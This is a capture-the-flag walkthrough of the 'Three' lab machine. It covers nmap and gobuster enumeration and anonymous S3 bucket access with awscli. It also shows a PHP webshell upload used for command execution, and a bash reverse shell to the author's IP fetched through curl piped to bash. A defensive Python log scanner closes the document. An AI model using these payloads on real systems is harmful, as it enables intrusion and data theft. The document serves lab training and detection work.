Three (Tier 1)

Description

  • Tier -> 1

  • Difficulty -> Very Easy

  • OS -> Linux

  • Tags -> Cloud / Custom Applications / AWS / Reconnaissance / Web Site Structure Discovery / Bucket Enumeration / Arbitrary File Upload / Anonymous-Guest Access

Write-up

  • I started doing an initial scan using Nmap

nmap -p- -Pn --min-rate 2000 10.129.246.158

  • With this, I answered the first question

Answer: 2


  • Then I did an exhaustive scan to know more about the services running on the open ports

nmap -p22,80 -sVC 10.129.246.158

  • As I found the HTTP protocol running on port 80, I went to the browser to check the deployed content. I found what seemed to be a contact page for a band. Navigating through the site, I didn't find anything relevant apart from an email in the Contact section with a curious domain


  • With this and a little research, I answered the next questions

Answer: thetoppers.htb


Answer: /etc/hosts


  • As this domain could be relevant, I added it to the known hosts by editing the /etc/hosts file. Not getting anything relevant from the web page, I tried using the Gobuster tool to fuzz the page and find any possible hidden routes. In this case, I enumerated the found domain to check if there were any related subdomains. With that, I found the subdomain s3.thetoppers.htb existed, and with a little research, I learned it was related to a cloud database on the Amazon servers

echo "10.129.246.158 thetoppers.htb" | sudo tee -a /etc/hosts
gobuster vhost -u http://thetoppers.htb/ -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain

  • With this information and a little research about Amazon services, I answered the next questions

Answer: s3.thetoppers.htb


Answer: Amazon S3


Answer: awscli


Answer: aws configure


Answer: aws s3 ls


  • I also added the discovered subdomain to the known hosts to work properly with it

echo "10.129.246.158 s3.thetoppers.htb" | sudo tee -a /etc/hosts

  • So, knowing this was an AWS service, I tried to connect to it using the awscli utility. First, I configured the tool, in this case providing the placeholder value temp for the requested settings. With this done, I tried to list the S3 buckets and found one named thetoppers.htb. Then I listed the objects inside it and found an index.php file, which could be the source code of the web page

aws configure
aws --endpoint=http://s3.thetoppers.htb s3 ls
aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

The temp value serves as the default (placeholder) credentials for the AWS connection when everything else is skipped


  • With this, I answered the next question

Answer: PHP


  • Then, as I had a connection to the S3 bucket, I tried to upload a custom file to it in an attempt to gain RCE. To do so, I created a Shell.php file with a payload that executes the command received through a request parameter. Then I uploaded it and checked whether it had worked by listing the contents of the bucket again

sudo nano Shell.php
Shell.php:
<?php system($_GET["cmd"]); ?>
aws --endpoint=http://s3.thetoppers.htb s3 cp Shell.php s3://thetoppers.htb
aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb

  • After that, I accessed the bucket's address from the browser and tried to send a command through the cmd parameter defined in the payload. I saw the server executed it properly, which confirmed I had gained RCE

http://thetoppers.htb/Shell.php?cmd=id

  • With this, I could explore the filesystem arbitrarily. After some searching, I decided to check the /var/www folder, which is usually the default location for the server files, and there I found a flag.txt file. Finally, I retrieved the content of the file and got the flag

http://thetoppers.htb/Shell.php?cmd=ls /var/www
http://thetoppers.htb/Shell.php?cmd=cat /var/www/flag.txt

  • With this, I got the root flag and pwned the machine

Answer: a980d99281a28d638ac68b9bf9453c2b

Alternative Reverse Shell

Instead of abusing the RCE directly from the browser, I tried to get a reverse shell on the machine

  • First, I created a simple bash script to send the shell connection to my machine

sudo nano shell.sh
shell.sh:
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.195/1234 0>&1
# I used my IP on the VPN and an arbitrary port

  • Then I established a Netcat listener on the arbitrary port chosen above

nc -nvlp 1234

  • After this, in another terminal, I started an HTTP server with Python in the same folder where the shell.sh file is, using another arbitrary port for the server

python -m http.server 4444

  • I used the RCE to make the target fetch the script from my machine with the curl command and pipe it to bash. I observed the page remained loading and, checking the Python server, saw it had received the request

http://thetoppers.htb/Shell.php?cmd=curl%2010.10.14.195:4444/shell.sh|bash

  • Finally, I checked the Netcat listener and saw that I had gained a shell from the machine. With that, I could interact with the system more comfortably
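As an added defender-side example (my code, not part of the original write-up), this Python script scans constructed web-server access-log lines for the two traces the path above leaves on the target: an object with an executable extension written through a PUT to the S3 endpoint, and requests whose cmd-style parameter carries a shell command (the id, cat and curl | bash calls used here). The log format, the parameter names and the sample lines are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx combined-log prefix: client, timestamp, request line, status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# Parameter names used by one-line shells such as system($_GET["cmd"])
SHELL_PARAMS = {"cmd", "exec", "command"}
# Tokens that read like a shell command rather than ordinary page input
CMD_TOKENS = re.compile(r'\b(id|whoami|cat|ls|curl|wget|bash|sh|nc)\b|[|;&`]|/dev/tcp/')
EXEC_EXT = (".php", ".phtml", ".phar")

def classify(line):
    """Return (kind, client_ip, path, detail) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    # 1) a webshell-style parameter carrying a command (GET /Shell.php?cmd=id)
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name.lower() in SHELL_PARAMS and CMD_TOKENS.search(value):
            return ("webshell_command", m["ip"], url.path, value)
    # 2) executable content written through an S3-style PUT on the bucket
    if m["method"] == "PUT" and url.path.lower().endswith(EXEC_EXT):
        return ("executable_upload", m["ip"], url.path, m["status"])
    return None

def scan(lines):
    """Run classify over every line and keep only the findings."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (not captured from the box); the S3 endpoint and
# the web vhost are assumed to log to the same file.
SAMPLE_LOG = [
    '10.10.14.195 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=contact HTTP/1.1" 200 5120',
    '10.10.14.195 - - [01/Jan/2024:10:00:05 +0000] "GET /images/band.jpg HTTP/1.1" 200 80412',
    '10.10.14.195 - - [01/Jan/2024:10:01:00 +0000] "PUT /thetoppers.htb/Shell.php HTTP/1.1" 200 0',
    '10.10.14.195 - - [01/Jan/2024:10:01:30 +0000] "GET /Shell.php?cmd=id HTTP/1.1" 200 54',
    '10.10.14.195 - - [01/Jan/2024:10:02:00 +0000] "GET /Shell.php?cmd=cat%20/var/www/flag.txt HTTP/1.1" 200 33',
    '10.10.14.195 - - [01/Jan/2024:10:03:00 +0000] "GET /Shell.php?cmd=curl%2010.10.14.195:4444/shell.sh|bash HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for kind, ip, path, detail in scan(SAMPLE_LOG):
        print(f"{kind:18} {ip:15} {path} -> {detail}")
```

The benign contact-page and image requests produce no finding, while the PUT of Shell.php and the three command requests are reported with the decoded command.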
